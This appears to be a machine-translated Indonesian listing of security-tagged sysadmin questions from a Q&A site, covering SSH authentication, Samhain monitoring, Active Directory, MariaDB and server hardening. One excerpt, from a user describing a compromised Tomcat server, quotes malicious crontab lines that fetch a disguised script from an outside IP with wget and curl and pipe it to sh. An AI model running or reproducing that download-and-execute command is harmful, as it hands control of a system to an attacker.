Pertanyaan yang diberi tag «security»

Saya ingin memiliki satu set pengguna yang mengautentikasi menggunakan kunci publik auth dan pengguna lain untuk menggunakan otentikasi kata sandi. Apakah ini mungkin di OpenSSH di Linux? Jika demikian, bagaimana saya melakukannya? Setelah memeriksa /etc/ssh/sshd_config, sepertinya saya terbatas pada mengaktifkan otentikasi kunci atau menggunakan PAM.

9 linux  security  ssh 

Saya ingin Samhain memantau file, katakan misalnya /root/somefile,. File ini saat ini tidak ada, tetapi saya ingin diberi tahu jika itu dibuat kapan saja. Saya menambahkan ini ke samhainrc: [ReadOnly] file = /root/somefile Ini menyebabkan Samhain memancarkan entri log ini: Oct 18 22:54:04 ip-172-31-24-115 Samhain[17123]: CRIT : [2018-10-18T22:54:04+0000] interface=<lstat>, msg=<No …

8 linux  security  intrusion-detection 

Saya memiliki sekitar 200 pengguna. 50 di Asia, 50 di Eropa Selatan dan Timur dan sekitar 100 di Eropa Barat. Saya ingin mengarahkan 50 pengguna yang berada di Asia ke DC kami di Asia, dan saat ini tampaknya mereka mengautentikasi ke server Eropa kami, menyebabkan keterlambatan besar pada akhir itu. …

8 windows  windows-server-2008  active-directory  security 

Saat menjalankan perang proyek di server tomcat Apache saya menemukan bahwa server telah dikompromikan. Saat menjalankan perang melawan orang tak dikenal cronberjalan seperti ini [root@App2 tmp]# crontab -l -u tomcat */11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh */12 * * * * curl http://91.230.47.40/pics/logo.jpg|sh Yang diunduh logo.jpgmemiliki …

8 linux  shell  security  tomcat 

Tutup. Pertanyaan ini di luar topik . Saat ini tidak menerima jawaban. Ingin meningkatkan pertanyaan ini? Perbarui pertanyaan sehingga sesuai topik untuk Kesalahan Server. Ditutup 3 tahun yang lalu . Apa cara paling sederhana untuk mendapatkan pemberitahuan ketika acara tertentu muncul di log Windows - di mana saja di jaringan …

8 security  windows-event-log 

Saya baru saja menginstal MariaDbpada Gnome Ubuntu baru dan menjalankan mysql_secure_installation setelah itu di mana saya menetapkan kata sandi admin yang layak, menghapus pengguna anonim dll. Setelah itu saya menyadari beberapa perilaku aneh mengenai kata sandi admin: Jika saya mencoba masuk dari akun pengguna normal saya menggunakan perintah, mysql -u …

8 security  mariadb  authorization 

Metasploit baru di kalilinux 2016 (stable terbaru) systemctl start postgresql OK Pada msfconsole msf > db_status [*] postgresql connected to msf Ketika saya meluncurkan pencarian msf > search samba [!] Module database cache not built yet, using slow search Jadi saya membangun kembali cache ... msf > db_rebuild_cache Dan ketika …

8 linux  security 

Pertanyaan ini mengacu pada utas Twitter @ SwiftOnSecurity: https://twitter.com/SwiftOnSecurity/status/655208224572882944 Setelah membaca utas, saya masih belum mengerti mengapa Anda ingin menonaktifkan login jaringan untuk akun lokal. Jadi inilah yang saya pikirkan, tolong perbaiki saya di mana saya salah: Katakanlah saya memiliki pengaturan AD dengan DC dan banyak klien. Salah satu kliennya …

8 windows  active-directory  security  group-policy  windows-server-2012-r2 

Latar Belakang : Agregasi log jarak jauh dianggap sebagai cara untuk meningkatkan keamanan. Secara umum, ini mengatasi risiko bahwa penyerang yang berkompromi dengan sistem dapat mengedit atau menghapus log untuk menggagalkan analisis forensik. Saya telah meneliti opsi keamanan di alat log umum. Tapi ada yang terasa salah. Saya tidak bisa …

8 security  logging  rsyslog  logstash  syslog-ng 

Saya memiliki server khusus debian. Saya mencoba untuk mengamankannya dan satu cara saya pikir akan lebih baik adalah mematikan layanan yang tidak saya butuhkan, seperti FTP misalnya. Saya menyarankan untuk menjalankan sesuatu seperti ini saat penerapan: service ntp stop update-rc.d -f ntp remove service vsftpd stop update-rc.d -f vsftpd remove …

8 linux  security  debian 

Akun AWS gratis saya kedaluwarsa. Saya menghapus semua sumber daya S3 dan EC2, tetapi saya berkeliaran jika saya dapat meninggalkan Key Pairsdan Security Groupstanpa harus membayarnya. (Sumber daya akun saya terlihat seperti ini sekarang: Sumber ) Dokumentasi Amazon sepertinya tidak menyebutkan masalah ini. Apakah sumber daya ini membutuhkan uang?

8 security  amazon-ec2  amazon-web-services  amazon-s3  resources 

Kami sudah memiliki sertifikat wildcard untuk *.mycompany.com. Jaringan kami memiliki host yang hanya dapat dijangkau secara internal. Semuanya milik internal.mycompany.comsubdomain. Ada server pribadi dengan nama host server.internal.mycompany.comtempat saya menyebarkan sertifikat wildcard kami. Ketika saya mengunjungi server web saya mendapatkan kesalahan ketidakcocokan nama host. Apakah saya benar-benar harus mendapatkan sertifikat wildcard …

8 security  ssl-certificate  subdomain  domain 

Pikirkan tentang perusahaan hosting web yang ingin membiarkan pengguna mengelola file dan menerima repositori melalui ssh. Ini termasuk: salinan aman (scp) membuat, menyalin, memindahkan / mengganti nama dan menghapus file mengeksekusi sebagian kecil perintah untuk kontrol sumber dan pengeditan teks (git, vim, nano) Kami ingin menerapkan itu dan melihat ke …

8 linux  security 

Saya telah melihat menyebutkan mengamankan / dev / shm dan / proc dan saya bertanya-tanya bagaimana Anda melakukan itu dan apa yang dilakukan dengan melakukan? Saya berasumsi ini melibatkan /etc/sysctl.conf beberapa jenis hak. Seperti ini? kernel.exec-shield = 1 kernel.randomize_va_space = 1

8 linux  security  kernel 

Salah satu server email semi-sibuk (sendmail) kami memiliki banyak koneksi inbound selama beberapa hari terakhir dari host yang mengeluarkan perintah sampah. Dalam dua hari terakhir: koneksi smtp masuk dengan perintah tidak valid dari 39.000 IP unik IP berasal dari berbagai rentang di seluruh dunia, bukan hanya beberapa jaringan yang dapat …

8 linux  security  smtp  sendmail